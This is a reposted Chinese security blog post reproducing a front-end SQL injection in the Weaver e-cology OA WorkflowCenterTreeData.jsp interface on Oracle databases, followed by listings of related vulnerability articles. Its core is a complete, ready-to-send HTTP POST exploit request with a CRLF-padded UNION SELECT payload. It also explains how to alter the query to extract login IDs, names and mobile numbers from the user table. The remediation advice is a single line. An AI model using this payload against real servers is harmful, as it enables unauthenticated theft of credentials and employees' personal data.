泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现

最新推荐文章于 2024-07-29 13:15:41 发布
转载 最新推荐文章于 2024-07-29 13:15:41 发布 · 1.8k 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://blog.youkuaiyun.com/zycdn/article/details/102494037
文章标签:

#泛微 #sql注入

本文详细描述了泛微e-cology OA系统在使用Oracle数据库时存在的SQL注入漏洞,通过分析WorkflowCenterTreeData接口的SQL语句拼接缺陷,揭示了漏洞的成因及影响范围,并提供了漏洞复现步骤,最后给出了修复建议。

漏洞描述

泛微e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞

影响范围

使用oracle数据库的泛微 e-cology OA 系统

漏洞复现

POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 2236
Connection: close
Upgrade-Insecure-Requests: 1

formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1

修改NULL后\的字段为要查询的字段名,修改from后的字段为要查询的表名

存在漏洞

修改后的示例

无漏洞

不存在注入漏洞

本人测试

有漏洞

有漏洞
查询登录ID
select NULL,loginid from hrmresource貌似只能挨个字段查询 lastname,mobile

数据字典

下载地址

修复建议

更新补丁

E-Cology9 WorkPlanService 前台SQL注入漏洞复现(XVE-2024-18112)
0xSec
07-26 1519
2024年7月,官方发布了新补丁,修复了一处SQL注入漏洞。经分析,攻击者无需认证即可利用该漏洞,建议受影响的客户尽快修复漏洞
漏洞复现OA E-Cology GetLabelByModule SQL注入漏洞
晚风不及你
05-16 1570
OA E-Cology getLabelByModule存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器。
漏洞预警】OA WorkflowCenterTreeData接口注入漏洞(限oracle数据库)
Summer's blog
05-13 7749
目录 0x01 漏洞描述 0x02 漏洞威胁等级 0x03 漏洞成因 0x04 漏洞复现 0x05 修复建议 0x06 免责申明 0x01 漏洞描述 e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 0x02 漏洞威胁等级 高危 影响范围 所有使用Oracle数据库的服务...
OA WorkflowCenterTreeData接口注入复现(仅限oracle数据库)
weixin_43815032的博客
10-11 1098
背景 2019年10月10日CNVD发布了e-cology OA系统存在SQL注入漏洞。该漏洞是由于OA系统的WorkflowCenterTreeData接口中涉及Oracle数据库的SQL语句缺乏安全检查措施所导致的,任意攻击者都可借SQL语句拼接时机注入恶意payload,造成SQL注入攻击。 漏洞描述 ...
Web安全-相关系统-历史漏洞
csjsz的博客
07-01 5190
2019年 e-cology OA数据库配置信息泄漏 包括不限于8.0、9.0版本 /mobile/dbconfigreader.jsp 2019年 e-cology OA系统V8、V9版本SQL注入(暂未发现公开poc) 2019年 e-cology OA系统远程代码执行 0x02 影响范围 包括但不限于7.0,8.0,8.1 /weaver/bsh.servlet.BshServlet/ CNVD-2019-34241 /mobile/browser/WorkflowCenterT
oracle 权限问题9017,OA 曝出WorkflowCenterTreeData接口注入漏洞(限oracle数据库)
weixin_39531992的博客
04-11 880
玄蜂安全团队10月10日了解到。OA又双叒叕曝出了一个高危漏洞。其存在点是企业使用Oracle数据库在其系统的WorkflowCenterTreeData接口处会因为内置SQL语句拼接不严导致的一个注入漏洞。这个注入漏洞可以直接导致系统用户数据泄漏,篡改网页内容等一系列重大危害。建议用户,尽快升级到OA最新系统。前不久,OA爆出了RCE(远程代码执行)漏洞,造成了较大影响,希望广大用户重视...
漏洞预警】E-cology OA系统SQL注入漏洞
NOSEC2019的博客
10-10 3103
2019年10月,白帽汇安全研究院观测外网出现办公软件的SQL注入漏洞,攻击者可在未经身份验证的情况下进行攻击,获得系统敏感数据。该漏洞目前属于0day,所有使用了Oracle数据库的网站都有可能受到影响,且利用难度低,危害大(可获取密码等敏感信息),预计会对的主要服务地区——中国市场产生一定冲击。 该漏洞是由于OA系统的WorkflowCenterTreeData接口中涉及Orac...
漏洞复现OA E-Cology SignatureDownLoad SQL注入漏洞
晚风不及你
05-15 864
OA E-Cology SignatureDownLoad存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器。
漏洞复现OA E-Cology Browser SQL注入漏洞
晚风不及你
05-16 1027
OA E-Cology browser存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器。
漏洞复现OA E-Cology HrmCareerApplyPerView SQL注入漏洞
晚风不及你
05-15 900
OA E-Cology HrmCareerApplyPerView存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器
最新漏洞汇总----实时更新!!(1),阿里内部网络安全笔记火爆IT圈
m0_60666452的博客
04-07 1640
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
最新漏洞汇总----实时更新!!!
热门推荐
yggcwhat
07-31 1万+
最新漏洞汇总
最新漏洞汇总----实时更新!!,网络安全开发者应该会哪些东西才不会被公司淘汰
2401_84138968的博客
04-09 1276
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
漏洞复现 OA E-Cology V9 browser.jsp SQL注入漏洞
qq_50854662的博客
03-20 8889
漏洞复现 OA E-Cology V9 browser.jsp SQL注入漏洞
JBoss 4.x JBossMQ JMS(CVE-2017-7504)漏洞复现
qq_44504968的博客
09-08 613
JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504) 文章目录JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)漏洞原理实验环境漏洞环境漏洞复现 漏洞原理 Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存
[HW必备]|蓝队防守必须排查的57个安全漏洞与解决方案
03-18 5673
一、OA系统 二、E-mail 三、Web中间件 四、源代码管理 五、项目管理系统 六、开源运维监控 七、堡垒机
漏洞复现E-Cology9 WorkPlanService 前台SQL注入
最新发布
今天是几号的博客
07-29 3228
E-Cology9 中的 /services/WorkPlanService 接口存在SQL注入漏洞,攻击者可构造SOAP 请求进行SQL注入,窃取或修改数据库敏感信息,进一步利用可能获取目标系统权限。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
注入补丁_重大漏洞E-cology OA系统SQL注入漏洞及解决方案
weixin_33586063的博客
01-03 2822
E-cology OA系统SQL注入漏洞cnvd 国家信息安全漏洞共享平台发布【漏洞预警】CNNVD关于E-cology OA系统SQL注入漏洞情况的通报一、漏洞介绍 E-cology OA系统是一套兼具企业信息门户、知识管理、数据中心、工作流管理、人力资源管理、客户与合作伙伴管理、项目管理、财务管理、资产管理功能的协同商务平台。e-cology OA系统的WorkflowCent...
oa e-cology v9 browser.jsp sql注入漏洞
09-15
OA E-Cology V9是一款常用的企业办公自动化系统,该系统的browser.jsp页面存在SQL注入漏洞SQL注入是一种常见的网络攻击技术,攻击者可以通过构造恶意的SQL语句来绕过系统的认证和授权机制,进而获取敏感数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值